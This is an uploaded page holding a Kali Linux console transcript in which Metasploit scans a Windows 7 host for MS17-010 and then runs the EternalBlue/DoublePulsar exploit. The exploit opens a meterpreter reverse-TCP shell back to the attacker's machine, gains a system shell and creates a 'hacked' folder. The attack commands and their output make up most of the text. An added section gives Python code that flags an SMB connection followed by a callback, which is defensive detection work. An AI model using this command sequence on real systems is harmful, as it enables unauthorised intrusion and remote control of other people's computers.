
Metasploit Win7

The document details using Metasploit to scan for and exploit the EternalBlue vulnerability to gain remote code execution on a Windows 7 system. Metasploit is used to scan for MS17-010, identify a vulnerable system, set options for the eternalblue_doublepulsar exploit such as payload and target, and execute the exploit to retrieve a meterpreter session and shell access on the remote system.

Uploaded by

kirancha77

Metasploit command and Hacked computer

root@kali:~# msfconsole
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhost 10.9.108.150
rhost => 10.9.108.150
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.9.108.150:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.9.108.150:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/externalblue_doublepulsar
[-] No results from search
[-] Failed to load module: exploit/windows/smb/externalblue_doublepulsar
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/externalblue-doublepulsar
[-] No results from search
[-] Failed to load module: exploit/windows/smb/externalblue-doublepulsar
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/eternalblue-doublepulsar
[-] No results from search
[-] Failed to load module: exploit/windows/smb/eternalblue-doublepulsar
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/eternalblue_doublepulsar
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set payload windows/x64/meterperter/reverse_tcp
[-] The value specified for payload is not valid.
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set processinject explorer.exe
processinject => explorer.exe
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set targetarchitecture x64
targetarchitecture => x64
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set rhost 10.9.108.150
rhost => 10.9.108.150
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set lhost 10.9.108.148
lhost => 10.9.108.148
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set lport 4444
lport => 4444
msf5 exploit(windows/smb/eternalblue_doublepulsar) > run

[*] Started reverse TCP handler on 10.9.108.148:4444
[*] 10.9.108.150:445 - Generating Eternalblue XML data
[*] 10.9.108.150:445 - Generating Doublepulsar XML data
[*] 10.9.108.150:445 - Generating payload DLL for Doublepulsar
[*] 10.9.108.150:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 10.9.108.150:445 - Launching Eternalblue...
[+] 10.9.108.150:445 - Pwned! Eternalblue success!
[*] 10.9.108.150:445 - Launching Doublepulsar...
[*] Sending stage (206403 bytes) to 10.9.108.150
[*] Meterpreter session 1 opened (10.9.108.148:4444 -> 10.9.108.150:49158) at 2019-11-27 14:03:44 -0500
[+] 10.9.108.150:445 - Remote code executed... 3... 2... 1...

meterpreter >
meterpreter > sysinfo
Computer : WIN-4FNJFAGB7R3
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > shell
Process 2868 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd\
cd\

C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is AEAA-2E88

Directory of C:\

07/13/2009 10:20 PM <DIR> PerfLogs
11/12/2019 07:36 PM <DIR> Program Files
07/13/2009 11:57 PM <DIR> Program Files (x86)
11/12/2019 07:35 PM <DIR> Users
11/12/2019 07:35 PM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 52,804,333,568 bytes free
C:\>md hacked
md hacked

C:\>cd hacked
cd hacked

C:\hacked>
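
A defender-side view of the session above, as an added example that is not part of the original document: the transcript shows 10.9.108.148 connecting to 10.9.108.150:445 and, seconds later, 10.9.108.150 connecting back to 10.9.108.148:4444. The code below flags that pattern (a host that receives SMB and then opens a non-SMB connection back to the same peer) in flow records; the record format, the 14:03:30 timestamp, the source port 40112, the filler rows and the 60-second window are assumptions.

```python
from datetime import datetime, timedelta

SMB_PORT = 445

# Constructed flow records: (timestamp, src, src_port, dst, dst_port).
# The first two rows mirror the session above (the 14:03:30 timestamp and the
# source port 40112 are assumed); the remaining rows are benign filler.
FLOWS = [
    ("2019-11-27 14:03:30", "10.9.108.148", 40112, "10.9.108.150", 445),
    ("2019-11-27 14:03:44", "10.9.108.150", 49158, "10.9.108.148", 4444),
    ("2019-11-27 14:05:10", "10.9.108.20", 51544, "10.9.108.150", 445),
    ("2019-11-27 14:06:02", "10.9.108.150", 49160, "10.9.108.20", 445),
    ("2019-11-27 14:20:00", "10.9.108.150", 49171, "10.9.108.20", 8080),
]


def find_smb_callbacks(flows, window=timedelta(seconds=60)):
    """Flag hosts that receive an SMB connection and then open a non-SMB
    connection back to the same peer within `window`."""
    last_smb = {}  # (client, server) -> time of the latest client->server:445 flow
    alerts = []
    for ts, src, _sport, dst, dport in sorted(flows):
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        if dport == SMB_PORT:
            last_smb[(src, dst)] = when
            continue
        smb_seen = last_smb.get((dst, src))  # did dst talk SMB to src earlier?
        if smb_seen is not None and when - smb_seen <= window:
            alerts.append({
                "smb_server": src,
                "peer": dst,
                "callback_port": dport,
                "delay_s": int((when - smb_seen).total_seconds()),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_smb_callbacks(FLOWS):
        print(alert)
```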
